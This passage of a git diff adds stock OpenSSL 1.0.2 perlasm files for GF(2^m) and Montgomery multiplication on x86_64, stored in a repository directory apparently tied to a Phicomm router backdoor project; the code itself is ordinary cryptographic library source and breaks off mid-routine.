+	add	\$128+8,%rsp
+	ret
+.Lend_mul_1x1:
+.size	_mul_1x1,.-_mul_1x1
+___
+
+($rp,$a1,$a0,$b1,$b0) = $win64?	("%rcx","%rdx","%r8", "%r9","%r10") :	# Win64 order
+				("%rdi","%rsi","%rdx","%rcx","%r8");	# Unix order
+
+$code.=<<___;
+.extern	OPENSSL_ia32cap_P
+.globl	bn_GF2m_mul_2x2
+.type	bn_GF2m_mul_2x2,\@abi-omnipotent
+.align	16
+bn_GF2m_mul_2x2:
+	mov	OPENSSL_ia32cap_P(%rip),%rax
+	bt	\$33,%rax
+	jnc	.Lvanilla_mul_2x2
+
+	movq		$a1,%xmm0
+	movq		$b1,%xmm1
+	movq		$a0,%xmm2
+___
+$code.=<<___ if ($win64);
+	movq		40(%rsp),%xmm3
+___
+$code.=<<___ if (!$win64);
+	movq		$b0,%xmm3
+___
+$code.=<<___;
+	movdqa		%xmm0,%xmm4
+	movdqa		%xmm1,%xmm5
+	pclmulqdq	\$0,%xmm1,%xmm0	# a1·b1
+	pxor		%xmm2,%xmm4
+	pxor		%xmm3,%xmm5
+	pclmulqdq	\$0,%xmm3,%xmm2	# a0·b0
+	pclmulqdq	\$0,%xmm5,%xmm4	# (a0+a1)·(b0+b1)
+	xorps		%xmm0,%xmm4
+	xorps		%xmm2,%xmm4	# (a0+a1)·(b0+b1)-a0·b0-a1·b1
+	movdqa		%xmm4,%xmm5
+	pslldq		\$8,%xmm4
+	psrldq		\$8,%xmm5
+	pxor		%xmm4,%xmm2
+	pxor		%xmm5,%xmm0
+	movdqu		%xmm2,0($rp)
+	movdqu		%xmm0,16($rp)
+	ret
+
+.align	16
+.Lvanilla_mul_2x2:
+	lea	-8*17(%rsp),%rsp
+___
+$code.=<<___ if ($win64);
+	mov	`8*17+40`(%rsp),$b0
+	mov	%rdi,8*15(%rsp)
+	mov	%rsi,8*16(%rsp)
+___
+$code.=<<___;
+	mov	%r14,8*10(%rsp)
+	mov	%r13,8*11(%rsp)
+	mov	%r12,8*12(%rsp)
+	mov	%rbp,8*13(%rsp)
+	mov	%rbx,8*14(%rsp)
+.Lbody_mul_2x2:
+	mov	$rp,32(%rsp)		# save the arguments
+	mov	$a1,40(%rsp)
+	mov	$a0,48(%rsp)
+	mov	$b1,56(%rsp)
+	mov	$b0,64(%rsp)
+
+	mov	\$0xf,$mask
+	mov	$a1,$a
+	mov	$b1,$b
+	call	_mul_1x1		# a1·b1
+	mov	$lo,16(%rsp)
+	mov	$hi,24(%rsp)
+
+	mov	48(%rsp),$a
+	mov	64(%rsp),$b
+	call	_mul_1x1		# a0·b0
+	mov	$lo,0(%rsp)
+	mov	$hi,8(%rsp)
+
+	mov	40(%rsp),$a
+	mov	56(%rsp),$b
+	xor	48(%rsp),$a
+	xor	64(%rsp),$b
+	call	_mul_1x1		# (a0+a1)·(b0+b1)
+___
+	@r=("%rbx","%rcx","%rdi","%rsi");
+$code.=<<___;
+	mov	0(%rsp),@r[0]
+	mov	8(%rsp),@r[1]
+	mov	16(%rsp),@r[2]
+	mov	24(%rsp),@r[3]
+	mov	32(%rsp),%rbp
+
+	xor	$hi,$lo
+	xor	@r[1],$hi
+	xor	@r[0],$lo
+	mov	@r[0],0(%rbp)
+	xor	@r[2],$hi
+	mov	@r[3],24(%rbp)
+	xor	@r[3],$lo
+	xor	@r[3],$hi
+	xor	$hi,$lo
+	mov	$hi,16(%rbp)
+	mov	$lo,8(%rbp)
+
+	mov	8*10(%rsp),%r14
+	mov	8*11(%rsp),%r13
+	mov	8*12(%rsp),%r12
+	mov	8*13(%rsp),%rbp
+	mov	8*14(%rsp),%rbx
+___
+$code.=<<___ if ($win64);
+	mov	8*15(%rsp),%rdi
+	mov	8*16(%rsp),%rsi
+___
+$code.=<<___;
+	lea	8*17(%rsp),%rsp
+	ret
+.Lend_mul_2x2:
+.size	bn_GF2m_mul_2x2,.-bn_GF2m_mul_2x2
+.asciz	"GF(2^m) Multiplication for x86_64, CRYPTOGAMS by <appro\@openssl.org>"
+.align	16
+___
+
+# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
+#               CONTEXT *context,DISPATCHER_CONTEXT *disp)
+if ($win64) {
+$rec="%rcx";
+$frame="%rdx";
+$context="%r8";
+$disp="%r9";
+
+$code.=<<___;
+.extern __imp_RtlVirtualUnwind
+
+.type	se_handler,\@abi-omnipotent
+.align	16
+se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	152($context),%rax	# pull context->Rsp
+	mov	248($context),%rbx	# pull context->Rip
+
+	lea	.Lbody_mul_2x2(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip<"prologue" label
+	jb	.Lin_prologue
+
+	mov	8*10(%rax),%r14		# mimic epilogue
+	mov	8*11(%rax),%r13
+	mov	8*12(%rax),%r12
+	mov	8*13(%rax),%rbp
+	mov	8*14(%rax),%rbx
+	mov	8*15(%rax),%rdi
+	mov	8*16(%rax),%rsi
+
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+	mov	%r12,216($context)	# restore context->R12
+	mov	%r13,224($context)	# restore context->R13
+	mov	%r14,232($context)	# restore context->R14
+
+.Lin_prologue:
+	lea	8*17(%rax),%rax
+	mov	%rax,152($context)	# restore context->Rsp
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$154,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	add	\$64,%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	se_handler,.-se_handler
+
+.section	.pdata
+.align	4
+	.rva	_mul_1x1
+	.rva	.Lend_mul_1x1
+	.rva	.LSEH_info_1x1
+
+	.rva	.Lvanilla_mul_2x2
+	.rva	.Lend_mul_2x2
+	.rva	.LSEH_info_2x2
+.section	.xdata
+.align	8
+.LSEH_info_1x1:
+	.byte	0x01,0x07,0x02,0x00
+	.byte	0x07,0x01,0x11,0x00	# sub rsp,128+8
+.LSEH_info_2x2:
+	.byte	9,0,0,0
+	.rva	se_handler
+___
+}
+
+$code =~ s/\`([^\`]*)\`/eval($1)/gem;
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86_64-mont.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86_64-mont.pl
new file mode 100755
index 0000000..2989b58
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86_64-mont.pl
@@ -0,0 +1,1402 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# October 2005.
+#
+# Montgomery multiplication routine for x86_64. While it gives modest
+# 9% improvement of rsa4096 sign on Opteron, rsa512 sign runs more
+# than twice, >2x, as fast. Most common rsa1024 sign is improved by
+# respectful 50%. It remains to be seen if loop unrolling and
+# dedicated squaring routine can provide further improvement...
+
+# July 2011.
+#
+# Add dedicated squaring procedure. Performance improvement varies
+# from platform to platform, but in average it's ~5%/15%/25%/33%
+# for 512-/1024-/2048-/4096-bit RSA *sign* benchmarks respectively.
+
+# August 2011.
+#
+# Unroll and modulo-schedule inner loops in such manner that they
+# are "fallen through" for input lengths of 8, which is critical for
+# 1024-bit RSA *sign*. Average performance improvement in comparison
+# to *initial* version of this module from 2005 is ~0%/30%/40%/45%
+# for 512-/1024-/2048-/4096-bit RSA *sign* benchmarks respectively.
+
+# June 2013.
+#
+# Optimize reduction in squaring procedure and improve 1024+-bit RSA
+# sign performance by 10-16% on Intel Sandy Bridge and later
+# (virtually same on non-Intel processors).
+
+# August 2013.
+#
+# Add MULX/ADOX/ADCX code path.
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+if (`$ENV{CC} -Wa,-v -c -o /dev/null -x assembler /dev/null 2>&1`
+		=~ /GNU assembler version ([2-9]\.[0-9]+)/) {
+	$addx = ($1>=2.23);
+}
+
+if (!$addx && $win64 && ($flavour =~ /nasm/ || $ENV{ASM} =~ /nasm/) &&
+	    `nasm -v 2>&1` =~ /NASM version ([2-9]\.[0-9]+)/) {
+	$addx = ($1>=2.10);
+}
+
+if (!$addx && $win64 && ($flavour =~ /masm/ || $ENV{ASM} =~ /ml64/) &&
+	    `ml64 2>&1` =~ /Version ([0-9]+)\./) {
+	$addx = ($1>=12);
+}
+
+# int bn_mul_mont(
+$rp="%rdi";	# BN_ULONG *rp,
+$ap="%rsi";	# const BN_ULONG *ap,
+$bp="%rdx";	# const BN_ULONG *bp,
+$np="%rcx";	# const BN_ULONG *np,
+$n0="%r8";	# const BN_ULONG *n0,
+$num="%r9";	# int num);
+$lo0="%r10";
+$hi0="%r11";
+$hi1="%r13";
+$i="%r14";
+$j="%r15";
+$m0="%rbx";
+$m1="%rbp";
+
+$code=<<___;
+.text
+
+.extern	OPENSSL_ia32cap_P
+
+.globl	bn_mul_mont
+.type	bn_mul_mont,\@function,6
+.align	16
+bn_mul_mont:
+	test	\$3,${num}d
+	jnz	.Lmul_enter
+	cmp	\$8,${num}d
+	jb	.Lmul_enter
+___
+$code.=<<___ if ($addx);
+	mov	OPENSSL_ia32cap_P+8(%rip),%r11d
+___
+$code.=<<___;
+	cmp	$ap,$bp
+	jne	.Lmul4x_enter
+	test	\$7,${num}d
+	jz	.Lsqr8x_enter
+	jmp	.Lmul4x_enter
+
+.align	16
+.Lmul_enter:
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+
+	mov	${num}d,${num}d
+	lea	2($num),%r10
+	mov	%rsp,%r11
+	neg	%r10
+	lea	(%rsp,%r10,8),%rsp	# tp=alloca(8*(num+2))
+	and	\$-1024,%rsp		# minimize TLB usage
+
+	mov	%r11,8(%rsp,$num,8)	# tp[num+1]=%rsp
+.Lmul_body:
+	mov	$bp,%r12		# reassign $bp
+___
+		$bp="%r12";
+$code.=<<___;
+	mov	($n0),$n0		# pull n0[0] value
+	mov	($bp),$m0		# m0=bp[0]
+	mov	($ap),%rax
+
+	xor	$i,$i			# i=0
+	xor	$j,$j			# j=0
+
+	mov	$n0,$m1
+	mulq	$m0			# ap[0]*bp[0]
+	mov	%rax,$lo0
+	mov	($np),%rax
+
+	imulq	$lo0,$m1		# "tp[0]"*n0
+	mov	%rdx,$hi0
+
+	mulq	$m1			# np[0]*m1
+	add	%rax,$lo0		# discarded
+	mov	8($ap),%rax
+	adc	\$0,%rdx
+	mov	%rdx,$hi1
+
+	lea	1($j),$j		# j++
+	jmp	.L1st_enter
+
+.align	16
+.L1st:
+	add	%rax,$hi1
+	mov	($ap,$j,8),%rax
+	adc	\$0,%rdx
+	add	$hi0,$hi1		# np[j]*m1+ap[j]*bp[0]
+	mov	$lo0,$hi0
+	adc	\$0,%rdx
+	mov	$hi1,-16(%rsp,$j,8)	# tp[j-1]
+	mov	%rdx,$hi1
+
+.L1st_enter:
+	mulq	$m0			# ap[j]*bp[0]
+	add	%rax,$hi0
+	mov	($np,$j,8),%rax
+	adc	\$0,%rdx
+	lea	1($j),$j		# j++
+	mov	%rdx,$lo0
+
+	mulq	$m1			# np[j]*m1
+	cmp	$num,$j
+	jne	.L1st
+
+	add	%rax,$hi1
+	mov	($ap),%rax		# ap[0]
+	adc	\$0,%rdx
+	add	$hi0,$hi1		# np[j]*m1+ap[j]*bp[0]
+	adc	\$0,%rdx
+	mov	$hi1,-16(%rsp,$j,8)	# tp[j-1]
+	mov	%rdx,$hi1
+	mov	$lo0,$hi0
+
+	xor	%rdx,%rdx
+	add	$hi0,$hi1
+	adc	\$0,%rdx
+	mov	$hi1,-8(%rsp,$num,8)
+	mov	%rdx,(%rsp,$num,8)	# store upmost overflow bit
+
+	lea	1($i),$i		# i++
+	jmp	.Louter
+.align	16
+.Louter:
+	mov	($bp,$i,8),$m0		# m0=bp[i]
+	xor	$j,$j			# j=0
+	mov	$n0,$m1
+	mov	(%rsp),$lo0
+	mulq	$m0			# ap[0]*bp[i]
+	add	%rax,$lo0		# ap[0]*bp[i]+tp[0]
+	mov	($np),%rax
+	adc	\$0,%rdx
+
+	imulq	$lo0,$m1		# tp[0]*n0
+	mov	%rdx,$hi0
+
+	mulq	$m1			# np[0]*m1
+	add	%rax,$lo0		# discarded
+	mov	8($ap),%rax
+	adc	\$0,%rdx
+	mov	8(%rsp),$lo0		# tp[1]
+	mov	%rdx,$hi1
+
+	lea	1($j),$j		# j++
+	jmp	.Linner_enter
+
+.align	16
+.Linner:
+	add	%rax,$hi1
+	mov	($ap,$j,8),%rax
+	adc	\$0,%rdx
+	add	$lo0,$hi1		# np[j]*m1+ap[j]*bp[i]+tp[j]
+	mov	(%rsp,$j,8),$lo0
+	adc	\$0,%rdx
+	mov	$hi1,-16(%rsp,$j,8)	# tp[j-1]
+	mov	%rdx,$hi1
+
+.Linner_enter:
+	mulq	$m0			# ap[j]*bp[i]
+	add	%rax,$hi0
+	mov	($np,$j,8),%rax
+	adc	\$0,%rdx
+	add	$hi0,$lo0		# ap[j]*bp[i]+tp[j]
+	mov	%rdx,$hi0
+	adc	\$0,$hi0
+	lea	1($j),$j		# j++
+
+	mulq	$m1			# np[j]*m1
+	cmp	$num,$j
+	jne	.Linner
+
+	add	%rax,$hi1
+	mov	($ap),%rax		# ap[0]
+	adc	\$0,%rdx
+	add	$lo0,$hi1		# np[j]*m1+ap[j]*bp[i]+tp[j]
+	mov	(%rsp,$j,8),$lo0
+	adc	\$0,%rdx
+	mov	$hi1,-16(%rsp,$j,8)	# tp[j-1]
+	mov	%rdx,$hi1
+
+	xor	%rdx,%rdx
+	add	$hi0,$hi1
+	adc	\$0,%rdx
+	add	$lo0,$hi1		# pull upmost overflow bit
+	adc	\$0,%rdx
+	mov	$hi1,-8(%rsp,$num,8)
+	mov	%rdx,(%rsp,$num,8)	# store upmost overflow bit
+
+	lea	1($i),$i		# i++
+	cmp	$num,$i
+	jb	.Louter
+
+	xor	$i,$i			# i=0 and clear CF!
+	mov	(%rsp),%rax		# tp[0]
+	lea	(%rsp),$ap		# borrow ap for tp
+	mov	$num,$j			# j=num
+	jmp	.Lsub
+.align	16
+.Lsub:	sbb	($np,$i,8),%rax
+	mov	%rax,($rp,$i,8)		# rp[i]=tp[i]-np[i]
+	mov	8($ap,$i,8),%rax	# tp[i+1]
+	lea	1($i),$i		# i++
+	dec	$j			# doesnn't affect CF!
+	jnz	.Lsub
+
+	sbb	\$0,%rax		# handle upmost overflow bit
+	xor	$i,$i
+	and	%rax,$ap
+	not	%rax
+	mov	$rp,$np
+	and	%rax,$np
+	mov	$num,$j			# j=num
+	or	$np,$ap			# ap=borrow?tp:rp
+.align	16
+.Lcopy:					# copy or in-place refresh
+	mov	($ap,$i,8),%rax
+	mov	$i,(%rsp,$i,8)		# zap temporary vector
+	mov	%rax,($rp,$i,8)		# rp[i]=tp[i]
+	lea	1($i),$i
+	sub	\$1,$j
+	jnz	.Lcopy
+
+	mov	8(%rsp,$num,8),%rsi	# restore %rsp
+	mov	\$1,%rax
+	mov	(%rsi),%r15
+	mov	8(%rsi),%r14
+	mov	16(%rsi),%r13
+	mov	24(%rsi),%r12
+	mov	32(%rsi),%rbp
+	mov	40(%rsi),%rbx
+	lea	48(%rsi),%rsp
+.Lmul_epilogue:
+	ret
+.size	bn_mul_mont,.-bn_mul_mont
+___
+{{{
+my @A=("%r10","%r11");
+my @N=("%r13","%rdi");
+$code.=<<___;
+.type	bn_mul4x_mont,\@function,6
+.align	16
+bn_mul4x_mont:
+.Lmul4x_enter:
+___
+$code.=<<___ if ($addx);
+	and	\$0x80100,%r11d
+	cmp	\$0x80100,%r11d
+	je	.Lmulx4x_enter
+___
+$code.=<<___;
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+
+	mov	${num}d,${num}d
+	lea	4($num),%r10
+	mov	%rsp,%r11
+	neg	%r10
+	lea	(%rsp,%r10,8),%rsp	# tp=alloca(8*(num+4))
+	and	\$-1024,%rsp		# minimize TLB usage
+
+	mov	%r11,8(%rsp,$num,8)	# tp[num+1]=%rsp
+.Lmul4x_body:
+	mov	$rp,16(%rsp,$num,8)	# tp[num+2]=$rp
+	mov	%rdx,%r12		# reassign $bp
+___
+		$bp="%r12";
+$code.=<<___;
+	mov	($n0),$n0		# pull n0[0] value
+	mov	($bp),$m0		# m0=bp[0]
+	mov	($ap),%rax
+
+	xor	$i,$i			# i=0
+	xor	$j,$j			# j=0
+
+	mov	$n0,$m1
+	mulq	$m0			# ap[0]*bp[0]
+	mov	%rax,$A[0]
+	mov	($np),%rax
+
+	imulq	$A[0],$m1		# "tp[0]"*n0
+	mov	%rdx,$A[1]
+
+	mulq	$m1			# np[0]*m1
+	add	%rax,$A[0]		# discarded
+	mov	8($ap),%rax
+	adc	\$0,%rdx
+	mov	%rdx,$N[1]
+
+	mulq	$m0
+	add	%rax,$A[1]
+	mov	8($np),%rax
+	adc	\$0,%rdx
+	mov	%rdx,$A[0]
+
+	mulq	$m1
+	add	%rax,$N[1]
+	mov	16($ap),%rax
+	adc	\$0,%rdx
+	add	$A[1],$N[1]
+	lea	4($j),$j		# j++
+	adc	\$0,%rdx
+	mov	$N[1],(%rsp)
+	mov	%rdx,$N[0]
+	jmp	.L1st4x
+.align	16
+.L1st4x:
+	mulq	$m0			# ap[j]*bp[0]
+	add	%rax,$A[0]
+	mov	-16($np,$j,8),%rax
+	adc	\$0,%rdx
+	mov	%rdx,$A[1]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[0]
+	mov	-8($ap,$j,8),%rax
+	adc	\$0,%rdx
+	add	$A[0],$N[0]		# np[j]*m1+ap[j]*bp[0]
+	adc	\$0,%rdx
+	mov	$N[0],-24(%rsp,$j,8)	# tp[j-1]
+	mov	%rdx,$N[1]
+
+	mulq	$m0			# ap[j]*bp[0]
+	add	%rax,$A[1]
+	mov	-8($np,$j,8),%rax
+	adc	\$0,%rdx
+	mov	%rdx,$A[0]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[1]
+	mov	($ap,$j,8),%rax
+	adc	\$0,%rdx
+	add	$A[1],$N[1]		# np[j]*m1+ap[j]*bp[0]
+	adc	\$0,%rdx
+	mov	$N[1],-16(%rsp,$j,8)	# tp[j-1]
+	mov	%rdx,$N[0]
+
+	mulq	$m0			# ap[j]*bp[0]
+	add	%rax,$A[0]
+	mov	($np,$j,8),%rax
+	adc	\$0,%rdx
+	mov	%rdx,$A[1]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[0]
+	mov	8($ap,$j,8),%rax
+	adc	\$0,%rdx
+	add	$A[0],$N[0]		# np[j]*m1+ap[j]*bp[0]
+	adc	\$0,%rdx
+	mov	$N[0],-8(%rsp,$j,8)	# tp[j-1]
+	mov	%rdx,$N[1]
+
+	mulq	$m0			# ap[j]*bp[0]
+	add	%rax,$A[1]
+	mov	8($np,$j,8),%rax
+	adc	\$0,%rdx
+	lea	4($j),$j		# j++
+	mov	%rdx,$A[0]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[1]
+	mov	-16($ap,$j,8),%rax
+	adc	\$0,%rdx
+	add	$A[1],$N[1]		# np[j]*m1+ap[j]*bp[0]
+	adc	\$0,%rdx
+	mov	$N[1],-32(%rsp,$j,8)	# tp[j-1]
+	mov	%rdx,$N[0]
+	cmp	$num,$j
+	jb	.L1st4x
+
+	mulq	$m0			# ap[j]*bp[0]
+	add	%rax,$A[0]
+	mov	-16($np,$j,8),%rax
+	adc	\$0,%rdx
+	mov	%rdx,$A[1]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[0]
+	mov	-8($ap,$j,8),%rax
+	adc	\$0,%rdx
+	add	$A[0],$N[0]		# np[j]*m1+ap[j]*bp[0]
+	adc	\$0,%rdx
+	mov	$N[0],-24(%rsp,$j,8)	# tp[j-1]
+	mov	%rdx,$N[1]
+
+	mulq	$m0			# ap[j]*bp[0]
+	add	%rax,$A[1]
+	mov	-8($np,$j,8),%rax
+	adc	\$0,%rdx
+	mov	%rdx,$A[0]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[1]
+	mov	($ap),%rax		# ap[0]
+	adc	\$0,%rdx
+	add	$A[1],$N[1]		# np[j]*m1+ap[j]*bp[0]
+	adc	\$0,%rdx
+	mov	$N[1],-16(%rsp,$j,8)	# tp[j-1]
+	mov	%rdx,$N[0]
+
+	xor	$N[1],$N[1]
+	add	$A[0],$N[0]
+	adc	\$0,$N[1]
+	mov	$N[0],-8(%rsp,$j,8)
+	mov	$N[1],(%rsp,$j,8)	# store upmost overflow bit
+
+	lea	1($i),$i		# i++
+.align	4
+.Louter4x:
+	mov	($bp,$i,8),$m0		# m0=bp[i]
+	xor	$j,$j			# j=0
+	mov	(%rsp),$A[0]
+	mov	$n0,$m1
+	mulq	$m0			# ap[0]*bp[i]
+	add	%rax,$A[0]		# ap[0]*bp[i]+tp[0]
+	mov	($np),%rax
+	adc	\$0,%rdx
+
+	imulq	$A[0],$m1		# tp[0]*n0
+	mov	%rdx,$A[1]
+
+	mulq	$m1			# np[0]*m1
+	add	%rax,$A[0]		# "$N[0]", discarded
+	mov	8($ap),%rax
+	adc	\$0,%rdx
+	mov	%rdx,$N[1]
+
+	mulq	$m0			# ap[j]*bp[i]
+	add	%rax,$A[1]
+	mov	8($np),%rax
+	adc	\$0,%rdx
+	add	8(%rsp),$A[1]		# +tp[1]
+	adc	\$0,%rdx
+	mov	%rdx,$A[0]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[1]
+	mov	16($ap),%rax
+	adc	\$0,%rdx
+	add	$A[1],$N[1]		# np[j]*m1+ap[j]*bp[i]+tp[j]
+	lea	4($j),$j		# j+=2
+	adc	\$0,%rdx
+	mov	$N[1],(%rsp)		# tp[j-1]
+	mov	%rdx,$N[0]
+	jmp	.Linner4x
+.align	16
+.Linner4x:
+	mulq	$m0			# ap[j]*bp[i]
+	add	%rax,$A[0]
+	mov	-16($np,$j,8),%rax
+	adc	\$0,%rdx
+	add	-16(%rsp,$j,8),$A[0]	# ap[j]*bp[i]+tp[j]
+	adc	\$0,%rdx
+	mov	%rdx,$A[1]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[0]
+	mov	-8($ap,$j,8),%rax
+	adc	\$0,%rdx
+	add	$A[0],$N[0]
+	adc	\$0,%rdx
+	mov	$N[0],-24(%rsp,$j,8)	# tp[j-1]
+	mov	%rdx,$N[1]
+
+	mulq	$m0			# ap[j]*bp[i]
+	add	%rax,$A[1]
+	mov	-8($np,$j,8),%rax
+	adc	\$0,%rdx
+	add	-8(%rsp,$j,8),$A[1]
+	adc	\$0,%rdx
+	mov	%rdx,$A[0]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[1]
+	mov	($ap,$j,8),%rax
+	adc	\$0,%rdx
+	add	$A[1],$N[1]
+	adc	\$0,%rdx
+	mov	$N[1],-16(%rsp,$j,8)	# tp[j-1]
+	mov	%rdx,$N[0]
+
+	mulq	$m0			# ap[j]*bp[i]
+	add	%rax,$A[0]
+	mov	($np,$j,8),%rax
+	adc	\$0,%rdx
+	add	(%rsp,$j,8),$A[0]	# ap[j]*bp[i]+tp[j]
+	adc	\$0,%rdx
+	mov	%rdx,$A[1]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[0]
+	mov	8($ap,$j,8),%rax
+	adc	\$0,%rdx
+	add	$A[0],$N[0]
+	adc	\$0,%rdx
+	mov	$N[0],-8(%rsp,$j,8)	# tp[j-1]
+	mov	%rdx,$N[1]
+
+	mulq	$m0			# ap[j]*bp[i]
+	add	%rax,$A[1]
+	mov	8($np,$j,8),%rax
+	adc	\$0,%rdx
+	add	8(%rsp,$j,8),$A[1]
+	adc	\$0,%rdx
+	lea	4($j),$j		# j++
+	mov	%rdx,$A[0]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[1]
+	mov	-16($ap,$j,8),%rax
+	adc	\$0,%rdx
+	add	$A[1],$N[1]
+	adc	\$0,%rdx
+	mov	$N[1],-32(%rsp,$j,8)	# tp[j-1]
+	mov	%rdx,$N[0]
+	cmp	$num,$j
+	jb	.Linner4x
+
+	mulq	$m0			# ap[j]*bp[i]
+	add	%rax,$A[0]
+	mov	-16($np,$j,8),%rax
+	adc	\$0,%rdx
+	add	-16(%rsp,$j,8),$A[0]	# ap[j]*bp[i]+tp[j]
+	adc	\$0,%rdx
+	mov	%rdx,$A[1]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[0]
+	mov	-8($ap,$j,8),%rax
+	adc	\$0,%rdx
+	add	$A[0],$N[0]
+	adc	\$0,%rdx
+	mov	$N[0],-24(%rsp,$j,8)	# tp[j-1]
+	mov	%rdx,$N[1]
+
+	mulq	$m0			# ap[j]*bp[i]
+	add	%rax,$A[1]
+	mov	-8($np,$j,8),%rax
+	adc	\$0,%rdx
+	add	-8(%rsp,$j,8),$A[1]
+	adc	\$0,%rdx
+	lea	1($i),$i		# i++
+	mov	%rdx,$A[0]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[1]
+	mov	($ap),%rax		# ap[0]
+	adc	\$0,%rdx
+	add	$A[1],$N[1]
+	adc	\$0,%rdx
+	mov	$N[1],-16(%rsp,$j,8)	# tp[j-1]
+	mov	%rdx,$N[0]
+
+	xor	$N[1],$N[1]
+	add	$A[0],$N[0]
+	adc	\$0,$N[1]
+	add	(%rsp,$num,8),$N[0]	# pull upmost overflow bit
+	adc	\$0,$N[1]
+	mov	$N[0],-8(%rsp,$j,8)
+	mov	$N[1],(%rsp,$j,8)	# store upmost overflow bit
+
+	cmp	$num,$i
+	jb	.Louter4x
+___
+{
+my @ri=("%rax","%rdx",$m0,$m1);
+$code.=<<___;
+	mov	16(%rsp,$num,8),$rp	# restore $rp
+	mov	0(%rsp),@ri[0]		# tp[0]
+	pxor	%xmm0,%xmm0
+	mov	8(%rsp),@ri[1]		# tp[1]
+	shr	\$2,$num		# num/=4
+	lea	(%rsp),$ap		# borrow ap for tp
+	xor	$i,$i			# i=0 and clear CF!
+
+	sub	0($np),@ri[0]
+	mov	16($ap),@ri[2]		# tp[2]
+	mov	24($ap),@ri[3]		# tp[3]
+	sbb	8($np),@ri[1]
+	lea	-1($num),$j		# j=num/4-1
+	jmp	.Lsub4x
+.align	16
+.Lsub4x:
+	mov	@ri[0],0($rp,$i,8)	# rp[i]=tp[i]-np[i]
+	mov	@ri[1],8($rp,$i,8)	# rp[i]=tp[i]-np[i]
+	sbb	16($np,$i,8),@ri[2]
+	mov	32($ap,$i,8),@ri[0]	# tp[i+1]
+	mov	40($ap,$i,8),@ri[1]
+	sbb	24($np,$i,8),@ri[3]
+	mov	@ri[2],16($rp,$i,8)	# rp[i]=tp[i]-np[i]
+	mov	@ri[3],24($rp,$i,8)	# rp[i]=tp[i]-np[i]
+	sbb	32($np,$i,8),@ri[0]
+	mov	48($ap,$i,8),@ri[2]
+	mov	56($ap,$i,8),@ri[3]
+	sbb	40($np,$i,8),@ri[1]
+	lea	4($i),$i		# i++
+	dec	$j			# doesnn't affect CF!
+	jnz	.Lsub4x
+
+	mov	@ri[0],0($rp,$i,8)	# rp[i]=tp[i]-np[i]
+	mov	32($ap,$i,8),@ri[0]	# load overflow bit
+	sbb	16($np,$i,8),@ri[2]
+	mov	@ri[1],8($rp,$i,8)	# rp[i]=tp[i]-np[i]
+	sbb	24($np,$i,8),@ri[3]
+	mov	@ri[2],16($rp,$i,8)	# rp[i]=tp[i]-np[i]
+
+	sbb	\$0,@ri[0]		# handle upmost overflow bit
+	mov	@ri[3],24($rp,$i,8)	# rp[i]=tp[i]-np[i]
+	xor	$i,$i			# i=0
+	and	@ri[0],$ap
+	not	@ri[0]
+	mov	$rp,$np
+	and	@ri[0],$np
